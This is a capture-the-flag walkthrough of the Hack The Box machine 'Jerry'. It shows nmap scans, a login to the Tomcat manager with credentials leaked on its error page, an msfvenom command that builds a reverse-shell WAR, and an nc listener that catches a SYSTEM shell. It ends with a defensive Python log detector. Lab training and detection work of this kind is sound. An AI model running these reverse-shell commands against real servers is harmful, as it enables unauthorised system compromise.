# Jerry Writeup

![](/files/-MajKGDkh-S0sLqIk8Yb)

## Reconnaissance

Initial Nmap scan to find open ports, treating all hosts as online (**-Pn**):

```
nmap -Pn 10.10.10.95
```

![](/files/-MajM-KLSf1P5Qi1dCIe)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default Nmap scripts
* (**-p**): Specify the port, 8080
* (**-oN nmap**): Save the output to a file called nmap

```
nmap -sC -sV -p 8080 -oN nmap 10.10.10.95
```

![](/files/-MajMTSAg8POBI6vCbLr)

Let's visit the web server this machine is hosting on port 8080.

![](/files/-MajMaQ3OTy4oHcuqxkJ)

Looking at the site and testing around tells us that Apache Tomcat/7.0.88 is running on it and that we need a set of credentials to log in as manager to perform other actions.

What we can do now is search Google for default credentials that might work and let us log in to the server. We can also see a username and a password on the error page we get when we try to access the manager app with wrong credentials.

![](/files/-MajODQvnK9VqnIPuRnE)

Let's try logging in with these credentials.

![](/files/-MajOOatk72wEiHmdjoD)

![](/files/-MajOVNWKRVdwI16o29L)

And we are logged in! Looking at the application, we can see that we have an option to upload and execute WAR files. This is something that we can generate using msfvenom to try getting a reverse shell on the server.

## Exploitation

First we have to generate the WAR file with msfvenom, calling it reverse.war. I'm using my machine's IP for LHOST (listening host); make sure to put your own IP in the command.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f war > reverse.war
```

![](/files/-MajPs5YEGwdgetYfce3)

Now let's upload the file.

![](/files/-MajQ-i0iQq-LIUVj1rB)

After clicking Deploy, we can see that it has been added as a path under the Applications tab.

![](/files/-MajQDy7SigQDtxADGyq)

Clicking the link (*/reverse*) triggers the reverse shell, so we first have to start a Netcat listener on our machine.

```
nc -lvnp 1234
```

![](/files/-MajQ_B-0kc6L1zgV-DZ)

Once we click the link, we get the reverse shell, running as `nt authority\system`.

![](/files/-MajQoCvX9aewkOr1kSb)
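
From the defender's side, the steps above leave a recognisable trail in Tomcat's access log: repeated 401s on the manager app, a successful login, a deployment request, then a hit on a context that did not exist before. The following is an added example, not part of the original writeup; it assumes the common-format access log, and the log lines, the username `manager1` and the baseline context list are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's "common" AccessLogValve pattern
# (%h %l %u %t "%r" %s %b); timestamps, users and the nonce are made up.
SAMPLE_LOG = """\
10.10.14.19 - - [01/Jun/2021:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.19 - - [01/Jun/2021:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.19 - manager1 [01/Jun/2021:10:00:30 +0000] "GET /manager/html HTTP/1.1" 200 17432
10.10.14.19 - manager1 [01/Jun/2021:10:02:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19021
10.10.14.19 - - [01/Jun/2021:10:02:40 +0000] "GET /reverse/ HTTP/1.1" 200 0
192.168.1.5 - admin [01/Jun/2021:11:00:00 +0000] "GET /manager/html HTTP/1.1" 200 17432
"""

# Contexts expected before any deployment (assumed baseline; "" is ROOT).
BASELINE = {"", "manager", "host-manager", "docs", "examples"}
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
DEPLOY = re.compile(r"^/manager/(html/upload|text/deploy)\b")

def detect(log_text, baseline=BASELINE, min_failed=2):
    """Return (source_ip, finding) tuples in log order."""
    findings = []
    failed = defaultdict(int)  # 401 responses on /manager per source
    deployed = False           # set once any deployment request succeeds
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, user, method, path, status = m.groups()
        context = path.split("?")[0].strip("/").split("/")[0]
        if context == "manager":
            if status == "401":
                # A browser gets one 401 before it sends credentials, hence min_failed.
                failed[ip] += 1
            elif status.startswith("2") and user != "-":
                if failed[ip] >= min_failed:
                    findings.append((ip, f"manager login as {user} after {failed[ip]} failed attempts"))
                failed[ip] = 0
            if method in ("POST", "PUT") and DEPLOY.match(path) and status.startswith("2"):
                deployed = True
                findings.append((ip, "application deployed through manager"))
        elif deployed and context not in baseline:
            findings.append((ip, f"request to unbaselined context /{context}"))
    return findings

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG):
        print(ip, finding)
```

The context check uses only the first path segment, so files served directly from ROOT would need to be added to the baseline before using this on a real log.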

